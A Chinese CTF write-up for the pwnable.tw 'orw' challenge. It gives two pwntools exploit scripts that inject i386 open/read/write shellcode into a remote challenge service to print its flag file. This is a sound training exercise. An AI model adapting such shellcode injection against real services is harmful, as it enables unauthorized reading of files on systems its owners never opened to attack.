
pwnable-orw

orw入门题

解法一:

我直接用shellcraft生成的shellcode

from pwn import *
from struct import pack
from LibcSearcher import *
from ae64 import AE64
import base64
from ctypes import *

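try:
    p = remote('chall.pwnable.tw', 10001)
except Exception:
    # Any connection failure (DNS, refused, timeout) falls back to the local
    # binary. `except Exception` instead of a bare `except:` keeps Ctrl-C and
    # SystemExit working. Caveat: a typo in the host name also lands here
    # silently -- check the first debug log line to see which tube you got.
    p = process('./pwn')

# 32-bit Linux target: every shellcraft/asm call below keys off this context.
context(arch="i386", os="linux", log_level="debug")
# The original also loaded ELF("/home/feichai/ctf_file/chal") and an x86_64
# libc (ELF + ctypes) here. None of them were used by the exploit, the paths
# are specific to the author's machine, and a 64-bit libc is the wrong
# artefact for an i386 target, so they are dropped to keep the script portable.

# Scratch buffer that receives the flag bytes. 0x0804A060 lies in the fixed
# 0x0804xxxx range, i.e. it presumes a non-PIE binary with writable data there
# -- confirm against the challenge ELF before reusing this value.
addr = 0x0804A060

# open("/home/orw/flag") -> read(fd, addr, 0x100) -> write(1, addr, 0x100).
# The read takes its fd from eax (open's return value) rather than assuming
# it is 3, so the chain keeps working if the target already has extra
# descriptors open.
shellcode = (
    shellcraft.open("/home/orw/flag")
    + shellcraft.read('eax', addr, 0x100)
    + shellcraft.write(1, addr, 0x100)
)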

def pwn():
    """Assemble the global shellcode, send it at the prompt, then go interactive.

    Relies on the module-level tube ``p`` and ``shellcode`` string. ``sendline``
    appends a newline after the payload; presumably that byte sits past the
    executed code and is harmless -- the flag is written before it is reached.
    """
    payload = asm(shellcode)
    p.sendlineafter(b':', payload)
    p.interactive()

if __name__ == '__main__':
    # Only fire the exploit when run as a script, not on import.
    pwn()

解法二:

手搓汇编代码,这里我是直接复制大佬写的

from pwn import *
from struct import pack
from LibcSearcher import *
from ae64 import AE64
import base64
from ctypes import *

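try:
    p = remote('chall.pwnable.tw', 10001)
except Exception:
    # Any connection failure falls back to the local binary. `except Exception`
    # instead of a bare `except:` keeps Ctrl-C and SystemExit working. Caveat:
    # a typo in the host name also lands here silently -- check the first
    # debug log line to see which tube you got.
    p = process('./pwn')

# 32-bit Linux target: the assembler below is driven by this context.
context(arch="i386", os="linux", log_level="debug")
# The original also loaded ELF("/home/feichai/ctf_file/chal") and an x86_64
# libc (ELF + ctypes) here. None of them were used by the exploit, the paths
# are specific to the author's machine, and a 64-bit libc is the wrong
# artefact for an i386 target, so they are dropped to keep the script portable.

# Hand-written i386 open/read/write chain. Differences from the copied
# original: the read fd is taken from eax (open's return value) instead of a
# hard-coded 3, and the duplicated `xor ecx, ecx` is gone (ecx is untouched
# between the pushes and the syscall). The Linux i386 syscall ABI preserves
# ebx/ecx/edx across `int 0x80`, so the path pointer in ebx survives open().
# The read buffer is the path area on the stack; 0x50 bytes overrun the 20
# pushed bytes into the caller's frame above esp -- harmless only because the
# shellcode never returns there.
shellcode = '''
    /* open("/home/orw/flag", O_RDONLY, 0) */
    xor ecx, ecx
    push ecx                 /* NUL terminator */
    push 0x67616c66          /* "flag" */
    push 0x2f2f2f77          /* "w///" */
    push 0x726f2f65          /* "e/or" */
    push 0x6d6f682f          /* "/hom"  -> "/home/orw///flag" on the stack */
    mov ebx, esp             /* pathname */
    xor edx, edx             /* mode = 0; ecx is already 0 = O_RDONLY */
    mov eax, 0x5             /* SYS_open */
    int 0x80

    /* read(fd, buf, 0x50) */
    mov ecx, ebx             /* reuse the path buffer as the read buffer */
    mov ebx, eax             /* fd returned by open, not an assumed 3 */
    mov eax, 0x3             /* SYS_read */
    mov edx, 0x50
    int 0x80

    /* write(1, buf, 0x50) */
    mov ebx, 0x1             /* stdout */
    mov eax, 0x4             /* SYS_write */
    mov edx, 0x50
    int 0x80
'''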

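def pwn():
    """Assemble the global shellcode, send it at the prompt, then go interactive.

    Relies on the module-level tube ``p`` and ``shellcode`` string. The prompt
    delimiter is passed as bytes, matching the first solution's tube usage;
    passing a ``str`` relied on pwntools' implicit encoding.
    """
    p.sendlineafter(b'shellcode:', asm(shellcode))
    p.interactive()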

if __name__ == '__main__':
    # Only fire the exploit when run as a script, not on import.
    pwn()
